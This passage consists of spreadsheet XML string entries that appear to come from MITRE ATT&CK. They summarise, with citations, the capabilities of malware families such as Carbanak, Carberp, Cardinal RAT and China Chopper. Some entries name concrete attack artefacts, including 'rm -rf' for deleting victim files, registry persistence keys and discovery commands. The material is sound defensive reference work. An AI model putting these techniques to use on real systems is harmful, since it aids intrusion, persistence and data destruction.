    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to capture screenshots and webcam photos.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to discover information about the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) adds permissions and remote logins to all users.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) uses the &lt;code&gt;zip -r&lt;/code&gt; command to compress the data collected on the local system.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) collects information on bookmarks from Google Chrome.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) can collect data from user directories.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) has the capability to use &lt;code&gt;rm -rf&lt;/code&gt; to remove folders and files from the victim's machine.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) presents an input prompt asking for the user's login and password.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) has the capability to upload and download files to the victim's machine.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) collects Keychain storage data and copies those passwords/tokens to a file.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) adds a .plist file to the /Library/LaunchAgents folder to maintain persistence.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) uses launchctl to enable screen sharing on the victim’s machine.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) has the capability to add its own account to the victim's machine.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274)'s installation file is an unsigned DMG image under the guise of Intego’s security solution for mac.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) runs the &lt;code&gt;ifconfig&lt;/code&gt; command to obtain the IP address from the victim’s machine.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) has the capability to download a file to the victim from the C2 server.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) uses AES to encrypt C2 traffic.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) has the capability to create a reverse shell on victims.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) exfiltrates collected data over email via SMTP/S and POP3/S C2 channels.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can obtain victim drive information as well as a list of folders in C:\Program Files.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can download a payload for execution.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) uses SMTP/S and POP3/S for C2 communications by sending and receiving emails.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can obtain a list of processes running on the system.(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can take a screenshot of the desktop.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can gather system information from the victim’s machine such as the OS version, machine name, and drive information.(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can gather the username from the system.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can collect the current time zone information from the victim’s machine.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) adds the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt; to establish persistence.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) exfiltrates data in compressed chunks if a message is larger than 4096 bytes .(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) has a command to delete files.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) logs key strokes for configured processes and sends them back to the C2 server.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) can create a Windows account.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>Local Email Collection</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) obtains Windows logon password details.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) encrypts strings to make analysis more difficult.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>Portable Executable Injection</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) downloads an executable and injects it directly into a new process.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) lists running processes.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) checks the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings&lt;/code&gt; for proxy configurations information.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) stores a configuration files in the startup directory to automatically execute commands in order to persist across reboots.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) has a plugin for VNC and Ammyy Admin Tool.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) enables concurrent Remote Desktop Protocol (RDP) sessions.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) encodes the message body of HTTP traffic with Base64.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) encrypts the message body of HTTP traffic with RC2 (in CBC mode). [Carbanak](https://attack.mitre.org/software/S0030) also uses XOR with random keys for its communications.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>The [Carbanak](https://attack.mitre.org/software/S0030) malware communicates to its command server using HTTP with an encrypted payload.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) has a command to create a reverse shell.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has queued an APC routine to explorer.exe by calling ZwQueueApcThread.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has installed a bootkit on the system to maintain persistence.(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>Credential API Hooking</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has hooked several Windows API functions during its Man in the Browser attack to steal credentials.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484)'s passw.plug plugin can gather account information from multiple instant messaging, email, and social media services, as well as FTP, VNC, and VPN clients.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484)'s passw.plug plugin can gather passwords saved in Opera, Internet Explorer, Safari, Firefox, and Chrome.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484)'s bootkit can inject a malicious DLL into the address space of running processes.(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has exfiltrated data via HTTP to already established C2 servers.(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has exploited multiple Windows vulnerabilities (CVE-2010-2743, CVE-2010-3338, CVE-2010-4398, CVE-2008-1084) and a .NET Runtime Optimization vulnerability for privilege escalation.(Citation: ESET Carberp March 2012)(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has created a hidden file in the Startup folder of the current user.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) can download and execute new plugins from the C2 server. (Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has captured credentials when a user performs login through a SSL session.(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has masqueraded as Windows system file names, as well as "chkntfs.exe" and "syscron.exe".(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has used the NtQueryDirectoryFile and ZwQueryDirectoryFile functions to hide files and directories.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has used XOR-based encryption to mask C2 server locations within the trojan.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has collected a list of running processes.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has searched the Image File Execution Options registry key for "Debugger" within every subkey.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has maintained persistence by placing itself inside the current user's startup folder.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has used user mode rootkit techniques to remain hidden on the system.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) can capture display screenshots with the screens_dll.dll plugin.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has queried the infected system's registry searching for specific registry keys associated with antivirus products.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has collected the operating system version from the infected system.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>VNC</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) can start a remote VNC session by downloading a new plugin.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software.(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has connected to C2 servers via HTTP.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) has used RSA encryption for C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) decrypts task and configuration files for execution.(Citation: ESET Carbon Mar 2017)(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) has a command to inject code into a process.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses HTTP to send data to the C2 server.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) creates a base directory that contains the files and folders that are collected.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses TCP and UDP for C2.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) encrypts configuration files and tasks for the malware to complete using CAST-128 algorithm.(Citation: ESET Carbon Mar 2017)(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;net group&lt;/code&gt; command.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can list the processes on the victim’s machine.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) enumerates values in the Registry.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;net view&lt;/code&gt; command.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) creates several tasks for later execution to continue persistence on the victim’s machine.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can collect the IP address of the victims and other computers on the network using the commands: &lt;code&gt;ipconfig -all&lt;/code&gt; &lt;code&gt;nbtstat -n&lt;/code&gt;, and &lt;code&gt;nbtstat -s&lt;/code&gt;.(Citation: ESET Carbon Mar 2017)(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;netstat -r&lt;/code&gt; and &lt;code&gt;netstat -an&lt;/code&gt; commands.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the command &lt;code&gt;net time \\127.0.0.1&lt;/code&gt; to get information the system’s time.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can use HTTP in C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can use Pastebin to receive C2 commands.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) establishes persistence by creating a service and naming it based off the operating system version running on the current machine.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) applies compression to C2 traffic using the ZLIB library.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>Compile After Delivery</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) decodes many of its artifacts and is decrypted (AES-128) after being downloaded.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can communicate over multiple C2 host and port combinations.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can uninstall itself, including deleting its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) checks its current working directory upon execution and also contains watchdog functionality that ensures its executable is located in the correct path (else it will rewrite the payload).(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can download and execute additional payloads.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can log keystrokes.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) lures victims into executing malicious macros embedded within Microsoft Excel documents.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) sets &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Cardinal RAT](https://attack.mitre.org/software/S0348) encodes many of its artifacts and is encrypted (AES-128) when downloaded.(Citation: PaloAlto CardinalRat Apr 2017) </t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) contains watchdog functionality that ensures its process is always running, else spawns a new instance.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) injects into a newly spawned process created from a native Windows executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can act as a reverse proxy.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) contains watchdog functionality that periodically ensures &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; is set to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) establishes Persistence by setting the  &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; Registry key to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can capture screenshots.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) uses a secret key with a series of XOR and addition operations to encrypt C2 traffic.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can collect the username from a victim machine.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) is downloaded using HTTP over port 443.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can execute commands.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) obtains application windows titles and then determines which windows to perform [Screen Capture](https://attack.mitre.org/techniques/T1113) on.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) steals data stored in the clipboard.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) collects keystrokes from the victim’s machine.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) stores the gathered data from the machine in .db files and .bmp files under four separate locations.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) creates three Registry keys to establish persistence by adding a [Windows Service](https://attack.mitre.org/techniques/T1543/003).(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) captures screenshots based on specific keywords in the window’s title.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) gathers the Mac address, IP address, and the network adapter information from the victim’s machine.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) adds a new service named NetAdapter to establish persistence.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to perform brute force attacks on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to collect information from the local database.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can upload files over the C2 channel.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can search for files in directories.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to download and upload files to the system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of local groups of users from a system.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a command to modify a Registry key.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to use a port scanner on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can gather a list of processes running on the machine.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to use a rootkit on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to gather information from the compromrised asset, including the computer version, computer name, IIS version, and more.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can gather the IP address from the victim's machine using the IP config command.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of user accounts from a victim's machine.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of the services from a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can run commands on the compromised asset with CMD functions.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) steals credentials stored inside Internet Explorer.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) can alter the victim's proxy configuration.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) collects the victim's %TEMP% directory path and version of Internet Explorer.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) is capable of downloading files, including additional modules.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) collects its process identifier (PID) on the victim.(Citation: Palo Alto menuPass Feb 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) establishes persistence by adding a Registry Run key.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) can encode C2 data with a custom technique that utilizes Base64.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) can encrypt C2 traffic with AES or RC4.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) collects the victim hostname, window resolution, and Microsoft Windows version.(Citation: Palo Alto menuPass Feb 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) conducts brute force attacks against SSH services to gain initial access.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>After initial compromise, [Chaos](https://attack.mitre.org/software/S0220) will download a second stage to establish a more permanent presence on the affected system.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell connection on 8338/TCP, encrypted via AES.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>Some variants of [Cherry Picker](https://attack.mitre.org/software/S0107) use AppInit_DLLs to achieve persistence by creating the following Registry key: &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows "AppInit_DLLs"="pserver32.dll"&lt;/code&gt;(Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>[Cherry Picker](https://attack.mitre.org/software/S0107) exfiltrates files over FTP.(Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>Recent versions of [Cherry Picker](https://attack.mitre.org/software/S0107) delete files and registry keys created by the malware.(Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can upload local files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can list directory contents.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can download remote files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can spider authentication portals.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
